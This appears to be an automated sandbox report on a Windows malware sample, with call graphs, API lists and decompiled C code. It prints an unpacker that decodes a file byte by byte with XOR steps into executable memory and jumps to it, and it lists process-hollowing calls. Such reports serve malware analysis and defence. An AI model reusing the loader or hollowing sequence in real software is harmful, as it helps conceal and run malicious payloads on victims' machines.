_free 55 API calls 6545->6547 6548 8aed22 GetCurrentThreadId 6546->6548 6549 8aed38 6547->6549 6548->6539 6549->6539 6551 8afb6a TlsGetValue 6550->6551 6552 8afb66 6550->6552 6551->6538 6552->6538 6554 8b24df 6553->6554 6558 8b24fa 6553->6558 6555 8b24eb 6554->6555 6554->6558 6557 8b10b7 __mtinitlocknum 57 API calls 6555->6557 6556 8b250a RtlAllocateHeap 6556->6558 6559 8b24f0 6556->6559 6557->6559 6558->6556 6558->6559 6562 8b13b0 DecodePointer 6558->6562 6559->6502 6561->6505 6563 8b13c3 6562->6563 6563->6558 6565 8b019a 6564->6565 6566 8b01ad EnterCriticalSection 6564->6566 6577 8b0211 6565->6577 6566->6512 6568 8b01a0 6568->6566 6569 8aeed7 __lock 57 API calls 6568->6569 6570 8b01ac 6569->6570 6570->6566 6769 8b02f3 LeaveCriticalSection 6571->6769 6573 8aedef 6573->6513 6770 8b02f3 LeaveCriticalSection 6574->6770 6576 8aedf8 6576->6518 6578 8b021d __mtinitlocknum 6577->6578 6579 8b023c 6578->6579 6599 8af776 6578->6599 6588 8b025f __mtinitlocknum 6579->6588 6641 8b0388 6579->6641 6586 8b025a 6590 8b10b7 __mtinitlocknum 58 API calls 6586->6590 6587 8b0269 6591 8b0189 __lock 58 API calls 6587->6591 6588->6568 6590->6588 6592 8b0270 6591->6592 6593 8b027d 6592->6593 6594 8b0295 6592->6594 6595 8afbb7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6593->6595 6596 8b0308 _free 58 API calls 6594->6596 6597 8b0289 6595->6597 6596->6597 6647 8b02b1 6597->6647 6650 8af99d 6599->6650 6601 8af77d 6602 8af99d __FF_MSGBANNER 58 API calls 6601->6602 6604 8af78a 6601->6604 6602->6604 6603 8af7d3 __NMSG_WRITE 58 API calls 6605 8af7a2 6603->6605 6604->6603 6607 8af7ac 6604->6607 6606 8af7d3 __NMSG_WRITE 58 API calls 6605->6606 6606->6607 6608 8af7d3 6607->6608 6609 8af7f1 __NMSG_WRITE 6608->6609 6610 8af99d __FF_MSGBANNER 55 API calls 6609->6610 6637 8af918 6609->6637 6612 8af804 6610->6612 6614 8af91d GetStdHandle 6612->6614 6616 8af99d __FF_MSGBANNER 55 API calls 6612->6616 6613 8af981 6638 8aeec1 6613->6638 6615 8af92b _strlen 6614->6615 6614->6637 6620 8af964 
WriteFile 6615->6620 6615->6637 6617 8af815 6616->6617 6617->6614 6618 8af827 6617->6618 6618->6637 6680 8b18e2 6618->6680 6620->6637 6622 8af854 GetModuleFileNameW 6624 8af874 6622->6624 6628 8af884 __NMSG_WRITE 6622->6628 6623 8af985 6625 8b1058 __invoke_watson 8 API calls 6623->6625 6626 8b18e2 __NMSG_WRITE 55 API calls 6624->6626 6627 8af98f 6625->6627 6626->6628 6628->6623 6629 8af8ca 6628->6629 6689 8b1a57 6628->6689 6629->6623 6698 8b19eb 6629->6698 6633 8b19eb __NMSG_WRITE 55 API calls 6634 8af901 6633->6634 6634->6623 6635 8af908 6634->6635 6707 8b1b15 EncodePointer 6635->6707 6732 8b1cfb 6637->6732 6747 8aee8d GetModuleHandleExW 6638->6747 6644 8b0396 6641->6644 6643 8b0253 6643->6586 6643->6587 6644->6643 6646 8b03a9 6644->6646 6750 8b2397 6644->6750 6646->6643 6646->6644 6767 8afebe Sleep 6646->6767 6768 8b02f3 LeaveCriticalSection 6647->6768 6649 8b02b8 6649->6588 6651 8af9a7 6650->6651 6652 8b10b7 __mtinitlocknum 58 API calls 6651->6652 6653 8af9b1 6651->6653 6654 8af9cd 6652->6654 6653->6601 6657 8b1048 6654->6657 6660 8b101d DecodePointer 6657->6660 6661 8b1030 6660->6661 6666 8b1058 IsProcessorFeaturePresent 6661->6666 6664 8b101d __fptostr 8 API calls 6665 8af9d8 6664->6665 6665->6601 6667 8b1063 6666->6667 6672 8b0eeb 6667->6672 6671 8b1047 6671->6664 6673 8b0f05 _memset __call_reportfault 6672->6673 6674 8b0f25 IsDebuggerPresent 6673->6674 6675 8afee1 __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 6674->6675 6676 8b0fe9 __call_reportfault 6675->6676 6677 8b1cfb ___crtMessageBoxW 6 API calls 6676->6677 6678 8b100c 6677->6678 6679 8afecc GetCurrentProcess TerminateProcess 6678->6679 6679->6671 6681 8b18ed 6680->6681 6682 8b18fb 6680->6682 6681->6682 6687 8b1914 6681->6687 6683 8b10b7 __mtinitlocknum 58 API calls 6682->6683 6684 8b1905 6683->6684 6685 8b1048 __fptostr 9 API calls 6684->6685 6686 8af847 6685->6686 6686->6622 6686->6623 6687->6686 6688 8b10b7 __mtinitlocknum 58 API calls 6687->6688 6688->6684 6690 8b1a65 
6689->6690 6691 8b1a69 6690->6691 6692 8b1a6e 6690->6692 6696 8b1aa8 6690->6696 6691->6692 6693 8b10b7 __mtinitlocknum 58 API calls 6691->6693 6692->6629 6694 8b1a99 6693->6694 6695 8b1048 __fptostr 9 API calls 6694->6695 6695->6692 6696->6692 6697 8b10b7 __mtinitlocknum 58 API calls 6696->6697 6697->6694 6699 8b1a05 6698->6699 6701 8b19f7 6698->6701 6700 8b10b7 __mtinitlocknum 58 API calls 6699->6700 6706 8b1a0f 6700->6706 6701->6699 6704 8b1a31 6701->6704 6702 8b1048 __fptostr 9 API calls 6703 8af8ea 6702->6703 6703->6623 6703->6633 6704->6703 6705 8b10b7 __mtinitlocknum 58 API calls 6704->6705 6705->6706 6706->6702 6708 8b1b49 ___crtIsPackagedApp 6707->6708 6709 8b1c08 IsDebuggerPresent 6708->6709 6710 8b1b58 LoadLibraryExW 6708->6710 6713 8b1c2d 6709->6713 6714 8b1c12 6709->6714 6711 8b1b6f GetLastError 6710->6711 6712 8b1b95 GetProcAddress 6710->6712 6715 8b1b7e LoadLibraryExW 6711->6715 6729 8b1c25 6711->6729 6716 8b1ba9 7 API calls 6712->6716 6712->6729 6718 8b1c20 6713->6718 6719 8b1c32 DecodePointer 6713->6719 6717 8b1c19 OutputDebugStringW 6714->6717 6714->6718 6715->6712 6715->6729 6720 8b1bf1 GetProcAddress EncodePointer 6716->6720 6721 8b1c05 6716->6721 6717->6718 6722 8b1c59 DecodePointer DecodePointer 6718->6722 6718->6729 6730 8b1c71 6718->6730 6719->6729 6720->6721 6721->6709 6722->6730 6723 8b1ca9 DecodePointer 6724 8b1c95 DecodePointer 6723->6724 6727 8b1cb0 6723->6727 6724->6729 6725 8b1cfb ___crtMessageBoxW 6 API calls 6728 8b1cf7 6725->6728 6727->6724 6731 8b1cc1 DecodePointer 6727->6731 6728->6637 6729->6725 6730->6723 6730->6724 6731->6724 6733 8b1d03 6732->6733 6734 8b1d05 IsProcessorFeaturePresent 6732->6734 6733->6613 6736 8b3425 6734->6736 6739 8b33d4 IsDebuggerPresent 6736->6739 6740 8b33e9 __call_reportfault 6739->6740 6745 8afee1 SetUnhandledExceptionFilter UnhandledExceptionFilter 6740->6745 6742 8b33f1 __call_reportfault 6746 8afecc GetCurrentProcess TerminateProcess 6742->6746 6744 8b340e 6744->6613 6745->6742 6746->6744 6748 
8aeeb8 ExitProcess 6747->6748 6749 8aeea6 GetProcAddress 6747->6749 6749->6748 6751 8b2412 6750->6751 6760 8b23a3 6750->6760 6752 8b13b0 __calloc_impl DecodePointer 6751->6752 6753 8b2418 6752->6753 6754 8b10b7 __mtinitlocknum 57 API calls 6753->6754 6766 8b240a 6754->6766 6755 8af776 __FF_MSGBANNER 57 API calls 6758 8b23ae 6755->6758 6756 8b23d6 RtlAllocateHeap 6756->6760 6756->6766 6757 8af7d3 __NMSG_WRITE 57 API calls 6757->6758 6758->6755 6758->6757 6758->6760 6761 8aeec1 __mtinitlocknum 3 API calls 6758->6761 6759 8b23fe 6763 8b10b7 __mtinitlocknum 57 API calls 6759->6763 6760->6756 6760->6758 6760->6759 6762 8b13b0 __calloc_impl DecodePointer 6760->6762 6764 8b23fc 6760->6764 6761->6758 6762->6760 6763->6764 6765 8b10b7 __mtinitlocknum 57 API calls 6764->6765 6765->6766 6766->6644 6767->6646 6768->6649 6769->6573 6770->6576 6774 8b02f3 LeaveCriticalSection 6771->6774 6773 8af455 6773->6408 6774->6773 6776 8b1394 EncodePointer 6775->6776 6776->6776 6777 8b13ae 6776->6777 6777->6447 6781 8b1280 6778->6781 6780 8b1387 6780->6449 6782 8b128c __mtinitlocknum 6781->6782 6789 8af039 6782->6789 6788 8b12b3 __mtinitlocknum 6788->6780 6790 8b0189 __lock 58 API calls 6789->6790 6791 8af040 6790->6791 6792 8b12c4 DecodePointer DecodePointer 6791->6792 6793 8b12a1 6792->6793 6794 8b12f1 6792->6794 6803 8b12be 6793->6803 6794->6793 6806 8b2e78 6794->6806 6796 8b1354 EncodePointer EncodePointer 6796->6793 6797 8b1328 6797->6793 6800 8b03cf __realloc_crt 61 API calls 6797->6800 6801 8b1342 EncodePointer 6797->6801 6798 8b1303 6798->6796 6798->6797 6813 8b03cf 6798->6813 6802 8b133c 6800->6802 6801->6796 6802->6793 6802->6801 6840 8af042 6803->6840 6807 8b2e81 6806->6807 6808 8b2e96 HeapSize 6806->6808 6809 8b10b7 __mtinitlocknum 58 API calls 6807->6809 6808->6798 6810 8b2e86 6809->6810 6811 8b1048 __fptostr 9 API calls 6810->6811 6812 8b2e91 6811->6812 6812->6798 6815 8b03d6 6813->6815 6816 8b0413 6815->6816 6818 8b2429 6815->6818 6839 8afebe Sleep 6815->6839 6816->6797 6819 
8b243d 6818->6819 6820 8b2432 6818->6820 6821 8b2445 6819->6821 6827 8b2452 6819->6827 6822 8b2397 __malloc_crt 58 API calls 6820->6822 6823 8b0308 _free 58 API calls 6821->6823 6824 8b243a 6822->6824 6836 8b244d __dosmaperr 6823->6836 6824->6815 6825 8b248a 6828 8b13b0 __calloc_impl DecodePointer 6825->6828 6826 8b245a HeapReAlloc 6826->6827 6826->6836 6827->6825 6827->6826 6831 8b24ba 6827->6831 6832 8b13b0 __calloc_impl DecodePointer 6827->6832 6835 8b24a2 6827->6835 6829 8b2490 6828->6829 6830 8b10b7 __mtinitlocknum 58 API calls 6829->6830 6830->6836 6833 8b10b7 __mtinitlocknum 58 API calls 6831->6833 6832->6827 6834 8b24bf GetLastError 6833->6834 6834->6836 6837 8b10b7 __mtinitlocknum 58 API calls 6835->6837 6836->6815 6838 8b24a7 GetLastError 6837->6838 6838->6836 6839->6815 6843 8b02f3 LeaveCriticalSection 6840->6843 6842 8af049 6842->6788 6843->6842 6844->6452 6846 8af04b _doexit 58 API calls 6845->6846 6847 8aeef2 6846->6847 6848 8af04b 6847->6848 6849 8af057 __mtinitlocknum 6848->6849 6850 8b0189 __lock 51 API calls 6849->6850 6851 8af05e 6850->6851 6852 8af117 _doexit 6851->6852 6853 8af08c DecodePointer 6851->6853 6868 8af165 6852->6868 6853->6852 6855 8af0a3 DecodePointer 6853->6855 6862 8af0b3 6855->6862 6857 8af174 __mtinitlocknum 6857->6471 6859 8af0c0 EncodePointer 6859->6862 6860 8af15c 6861 8aeec1 __mtinitlocknum 3 API calls 6860->6861 6863 8af165 6861->6863 6862->6852 6862->6859 6864 8af0d0 DecodePointer EncodePointer 6862->6864 6865 8af172 6863->6865 6873 8b02f3 LeaveCriticalSection 6863->6873 6866 8af0e2 DecodePointer DecodePointer 6864->6866 6865->6471 6866->6862 6869 8af16b 6868->6869 6870 8af145 6868->6870 6874 8b02f3 LeaveCriticalSection 6869->6874 6870->6857 6872 8b02f3 LeaveCriticalSection 6870->6872 6872->6860 6873->6865 6874->6870 7397 8affb0 7398 8affda 7397->7398 7399 8affe7 7397->7399 7400 8b1cfb ___crtMessageBoxW 6 API calls 7398->7400 7401 8b1cfb ___crtMessageBoxW 6 API calls 7399->7401 7400->7399 7404 8afff7 __except_handler4 
7401->7404 7402 8b00c4 __except_handler4 7403 8b010f 7402->7403 7405 8b00ff 7402->7405 7407 8b1cfb ___crtMessageBoxW 6 API calls 7402->7407 7404->7402 7404->7403 7409 8b004e __IsNonwritableInCurrentImage 7404->7409 7406 8b1cfb ___crtMessageBoxW 6 API calls 7405->7406 7406->7403 7407->7405 7415 8b1742 RtlUnwind 7409->7415 7410 8b0126 7412 8b1cfb ___crtMessageBoxW 6 API calls 7410->7412 7411 8b008c __except_handler4 7411->7410 7413 8b1cfb ___crtMessageBoxW 6 API calls 7411->7413 7414 8b0136 __except_handler4 7412->7414 7413->7410 7415->7411 8038 8aea30 8039 8aecd8 __getptd_noexit 58 API calls 8038->8039 8040 8aea39 8039->8040 8100 8a2271 8101 8aee33 8100->8101 8102 8aee67 8101->8102 8103 8afb72 __getptd_noexit TlsSetValue 8101->8103 8104 8aee70 __mtterm 61 API calls 8102->8104 8105 8aee46 8103->8105 8106 8aee6c 8104->8106 8105->8102 8107 8aee4c 8105->8107 8108 8aed47 __initptd 58 API calls 8107->8108 8109 8aee54 GetCurrentThreadId 8108->8109

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001204DC
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00120506
                          • ReadFile.KERNELBASE(00000000,00000000,00120248,?,00000000), ref: 0012051D
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0012053F
                          • CloseHandle.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,0012019C,7FDFFF66), ref: 001205B2
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 001205BD
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0012019C), ref: 00120608
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                          • String ID:
                          • API String ID: 721982790-0
                          • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                          • Instruction ID: 47a17514a964efb98d4adaa5735c13926ba66e04ccf7698547f6858255342762
                          • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                          • Instruction Fuzzy Hash: E7619131E00224ABCB15DFB4D884BAEB7B5AF58750F248259F505EB391EB349D118F54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 94%
                          			E008A4173(signed int __eax, void* __edx, void* __edi) {
                          				intOrPtr* _t14;
                          				void* _t15;
                          				void* _t17;
                          				intOrPtr _t19;
                          				void* _t20;
                          				void* _t21;
                          				void* _t22;
                          				intOrPtr _t23;
                          				signed int _t32;
                          				void* _t42;
                          				void* _t43;
                          				signed int _t44;
                          				void* _t46;
                          				void* _t47;
                          
                          				_t43 = __edi;
                          				_t42 = __edx;
                          				_t44 = __eax & 0x0000ffff;
                          				E008AF990(2);
                          				_t14 = 0x5a4d;
                          				_t47 =  *0x8a0000 - _t14; // 0x5a4d
                          				if(_t47 == 0) {
                          					_t14 =  *0x8a003c; // 0xe0
                          					__eflags =  *((intOrPtr*)(_t14 + 0x8a0000)) - 0x4550;
                          					if(__eflags != 0) {
                          						goto L2;
                          					} else {
                          						__eflags =  *((intOrPtr*)(_t14 + 0x8a0018)) - 0x10b;
                          						if(__eflags != 0) {
                          							goto L2;
                          						} else {
                          							_t32 = 0;
                          							__eflags =  *((intOrPtr*)(_t14 + 0x8a0074)) - 0xe;
                          							if(__eflags > 0) {
                          								__eflags =  *(_t14 + 0x8a00e8);
                          								_t6 =  *(_t14 + 0x8a00e8) != 0;
                          								__eflags = _t6;
                          								_t32 = 0 | _t6;
                          							}
                          						}
                          					}
                          				} else {
                          					L2:
                          					_t32 = 0;
                          				}
                          				 *(_t46 - 0x1c) = _t32;
                          				asm("in al, 0xe8");
                          				asm("lds ecx, [eax]");
                          				 *_t14 =  *_t14 + _t14;
                          				_t48 = _t14;
                          				if(_t14 == 0) {
                          					E008AE9B0(0x1c);
                          				}
                          				_t15 = E008AEDFA(_t32, _t43, _t48);
                          				_t49 = _t15;
                          				if(_t15 == 0) {
                          					_t15 = E008AE9B0(0x10);
                          				}
                          				E008AFA79(_t15);
                          				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                          				_t17 = E008AF1A3(_t32, _t43, _t44, _t49); // executed
                          				if(_t17 < 0) {
                          					E008AE9B0(0x1b);
                          				}
                          				 *0x8c101c = GetCommandLineW(); // executed
                          				_t19 = E008AFAB9(); // executed
                          				 *0x8bf0c8 = _t19;
                          				_t20 = E008AF457();
                          				_t51 = _t20;
                          				if(_t20 < 0) {
                          					_t20 = E008AEED7(_t32, _t42, _t43, _t44, _t51, 8);
                          				}
                          				_t21 = E008AF694(_t20, _t32, _t42, _t43, _t44);
                          				_t52 = _t21;
                          				if(_t21 < 0) {
                          					E008AEED7(_t32, _t42, _t43, _t44, _t52, 9);
                          				}
                          				_t22 = E008AEF11(1);
                          				_t53 = _t22;
                          				if(_t22 != 0) {
                          					E008AEED7(_t32, _t42, _t43, _t44, _t53, _t22);
                          				}
                          				_t23 = E008AFEF7();
                          				_push(_t44);
                          				E008A1000(0x8a0000, 0, _t23); // executed
                          				_t45 = _t23;
                          				 *((intOrPtr*)(_t46 - 0x24)) = _t23;
                          				if(_t32 == 0) {
                          					E008AF17A(_t45);
                          				}
                          				E008AEF02();
                          				 *(_t46 - 4) = 0xfffffffe;
                          				return E008AFF95(_t45);
                          			}


















                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__wsetargv__wsetenvp__wwincmdln
                          • String ID: .$
                          • API String ID: 965155184-2223841709
                          • Opcode ID: d09755f6bcf8eb5ce504bbe7748687d9629dc642e3d684f51b6e9c39cebf42d6
                          • Instruction ID: 87fadd7b4f139cd9cb2d781ec796443bfced0a472ba5b3baf0f4ca82842a2aec
                          • Opcode Fuzzy Hash: d09755f6bcf8eb5ce504bbe7748687d9629dc642e3d684f51b6e9c39cebf42d6
                          • Instruction Fuzzy Hash: B621B360A0071599FB607BF8988676B2650FF13754F244C7AFA05DADD3EFB8C8808A53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 91%
                          			E008A30E5(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
                          				void* _t10;
                          				void* _t12;
                          				intOrPtr _t14;
                          				void* _t15;
                          				void* _t16;
                          				void* _t17;
                          				intOrPtr _t18;
                          				void* _t27;
                          				void* _t37;
                          				void* _t38;
                          				void* _t39;
                          				void* _t41;
                          
                          				_t39 = __esi;
                          				_t38 = __edi;
                          				_t37 = __edx;
                          				_t27 = __ebx;
                          				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __eax;
                          				asm("in al, 0xe8");
                          				asm("lds ecx, [eax]");
                          				 *__ecx =  *__ecx + __ecx;
                          				_t43 = __ecx;
                          				if(__ecx == 0) {
                          					E008AE9B0(0x1c);
                          				}
                          				_t10 = E008AEDFA(_t27, _t38, _t43);
                          				_t44 = _t10;
                          				if(_t10 == 0) {
                          					_t10 = E008AE9B0(0x10);
                          				}
                          				E008AFA79(_t10);
                          				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                          				_t12 = E008AF1A3(_t27, _t38, _t39, _t44); // executed
                          				if(_t12 < 0) {
                          					E008AE9B0(0x1b);
                          				}
                          				 *0x8c101c = GetCommandLineW(); // executed
                          				_t14 = E008AFAB9(); // executed
                          				 *0x8bf0c8 = _t14;
                          				_t15 = E008AF457();
                          				_t46 = _t15;
                          				if(_t15 < 0) {
                          					_t15 = E008AEED7(_t27, _t37, _t38, _t39, _t46, 8);
                          				}
                          				_t16 = E008AF694(_t15, _t27, _t37, _t38, _t39);
                          				_t47 = _t16;
                          				if(_t16 < 0) {
                          					E008AEED7(_t27, _t37, _t38, _t39, _t47, 9);
                          				}
                          				_t17 = E008AEF11(1);
                          				_t48 = _t17;
                          				if(_t17 != 0) {
                          					E008AEED7(_t27, _t37, _t38, _t39, _t48, _t17);
                          				}
                          				_t18 = E008AFEF7();
                          				_push(_t39);
                          				E008A1000(0x8a0000, 0, _t18); // executed
                          				_t40 = _t18;
                          				 *((intOrPtr*)(_t41 - 0x24)) = _t18;
                          				if(_t27 == 0) {
                          					E008AF17A(_t40);
                          				}
                          				E008AEF02();
                          				 *(_t41 - 4) = 0xfffffffe;
                          				return E008AFF95(_t40);
                          			}
















                          APIs
                          • _fast_error_exit.LIBCMT ref: 008AE8CF
                            • Part of subcall function 008AE9B0: __FF_MSGBANNER.LIBCMT ref: 008AE9BC
                            • Part of subcall function 008AE9B0: __NMSG_WRITE.LIBCMT ref: 008AE9C4
                          • _fast_error_exit.LIBCMT ref: 008AE8E0
                          • __RTC_Initialize.LIBCMT ref: 008AE8E6
                          • __ioinit.LIBCMT ref: 008AE8EF
                          • _fast_error_exit.LIBCMT ref: 008AE8FA
                          • GetCommandLineW.KERNEL32 ref: 008AE900
                          • ___crtGetEnvironmentStringsW.LIBCMT ref: 008AE90B
                          • __wsetargv.LIBCMT ref: 008AE915
                          • __wsetenvp.LIBCMT ref: 008AE926
                          • __cinit.LIBCMT ref: 008AE939
                          • __wwincmdln.LIBCMT ref: 008AE94A
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__wsetargv__wsetenvp__wwincmdln
                          • String ID:
                          • API String ID: 965155184-0
                          • Opcode ID: b5ab956eed20f05a372d2e83b1aff10c2784c03741205e7fd92235a5aedd176e
                          • Instruction ID: 1f4328fb1270815b40bd831efc690f2a02e652aff3e1c4de0287aedc37cef172
                          • Opcode Fuzzy Hash: b5ab956eed20f05a372d2e83b1aff10c2784c03741205e7fd92235a5aedd176e
                          • Instruction Fuzzy Hash: B111BC20204316AAFA607BF89C46B6B2A44FF13354F240C7AFA40DACC3EFA9C4415223
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 164 12102f-1210dd call 1206c7 call 120776 * 7 181 1210e0-1210e4 164->181 182 1210e6-1210fa 181->182 183 1210fc-121109 181->183 182->181 184 12110c-121110 183->184 185 121112-121126 184->185 186 121128-121144 184->186 185->184 188 121146-121149 186->188 189 12114e-121178 CreateProcessW 186->189 190 1212f1-1212f4 188->190 192 121182-12119b 189->192 193 12117a-12117d 189->193 195 1211a5-1211bf ReadProcessMemory 192->195 196 12119d-1211a0 192->196 193->190 197 1211c1-1211c4 195->197 198 1211c9-1211d2 195->198 196->190 197->190 199 1211d4-1211e3 198->199 200 1211fc-12121c VirtualAllocEx 198->200 199->200 203 1211e5-1211f2 call 120368 199->203 201 121226-12123e call 120267 200->201 202 12121e-121221 200->202 209 121240-121243 201->209 210 121248-12124c 201->210 202->190 203->200 208 1211f4-1211f7 203->208 208->190 209->190 211 121255-12125f 210->211 212 121261-12128f call 120267 211->212 213 121296-1212b2 call 120267 211->213 217 121294 212->217 218 1212b4-1212b7 213->218 219 1212b9-1212d7 Wow64SetThreadContext 213->219 217->211 218->190 221 1212d9-1212dc 219->221 222 1212de-1212e1 call 1201b6 219->222 221->190 224 1212e6-1212e8 222->224 225 1212ea-1212ed 224->225 226 1212ef 224->226 225->190 226->190
                          APIs
                          • CreateProcessW.KERNEL32(?,00000000), ref: 00121173
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID: D
                          • API String ID: 963392458-2746444292
                          • Opcode ID: 397473f0824e4f4b43b6733d8b0170529a92fdd24fe94099af0223697035be09
                          • Instruction ID: 47c85d2145c5a002aae2e457d77010389c8a879f09c1682aa40106225ae0a023
                          • Opcode Fuzzy Hash: 397473f0824e4f4b43b6733d8b0170529a92fdd24fe94099af0223697035be09
                          • Instruction Fuzzy Hash: 1BA1E270E00229EFDB45DFA4D981BAEBBB9AF18344F2040A5F515EB251E730AE61DF10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 227 1207dd-12097e call 1206c7 call 120776 * 10 CreateFileW 253 120982-120991 227->253 254 120980 227->254 257 120993 253->257 258 120995-1209ab VirtualAlloc 253->258 255 1209e8-1209eb 254->255 257->255 259 1209af-1209c3 ReadFile 258->259 260 1209ad 258->260 261 1209c7-1209e5 CloseHandle call 1209ec call 120d07 ExitProcess 259->261 262 1209c5 259->262 260->255 262->255
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00120974
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: ac7005fe80b879d05ba83b6e2beb36413be2e8daa0394d11c94bb7434414d37e
                          • Instruction ID: 5d2e200e62995a1dedab7298b5e95af07a1849fe8c11a20e762fbbc88bff6d37
                          • Opcode Fuzzy Hash: ac7005fe80b879d05ba83b6e2beb36413be2e8daa0394d11c94bb7434414d37e
                          • Instruction Fuzzy Hash: DF617D35E40318EBEF51DBE4E852BEEB7B5AF48710F20811AE119FA2A1E7701E50DB05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E008A1000(WCHAR* _a12) {
                          				struct _OVERLAPPED* _v8;
                          				void* _v12;
                          				long _v16;
                          				void* _v20;
                          				long _v24;
                          				void* _t88;
                          				void* _t90;
                          
                          				 *0x8bf0c0 = E008AE6A0(E008AE750(), 0x7554284c);
                          				_t88 = CreateFileW(_a12, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                          				_v20 = _t88;
                          				_v16 = GetFileSize(_v20, 0);
                          				_t90 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
                          				_v12 = _t90;
                          				ReadFile(_v20, _v12, _v16,  &_v24, 0); // executed
                          				_v8 = 0;
                          				while(_v8 < _v16) {
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000ef;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x86;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000002;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000f8;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000036;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x93;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x1d;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xca;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x9e;
                          					 *(_v12 + _v8) =  *((intOrPtr*)(_v12 + _v8)) - 1;
                          					_v8 =  &(_v8->Internal);
                          				}
                          				goto __eax;
                          			}











                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 008A1032
                          • GetFileSize.KERNEL32(?,00000000), ref: 008A1041
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 008A1057
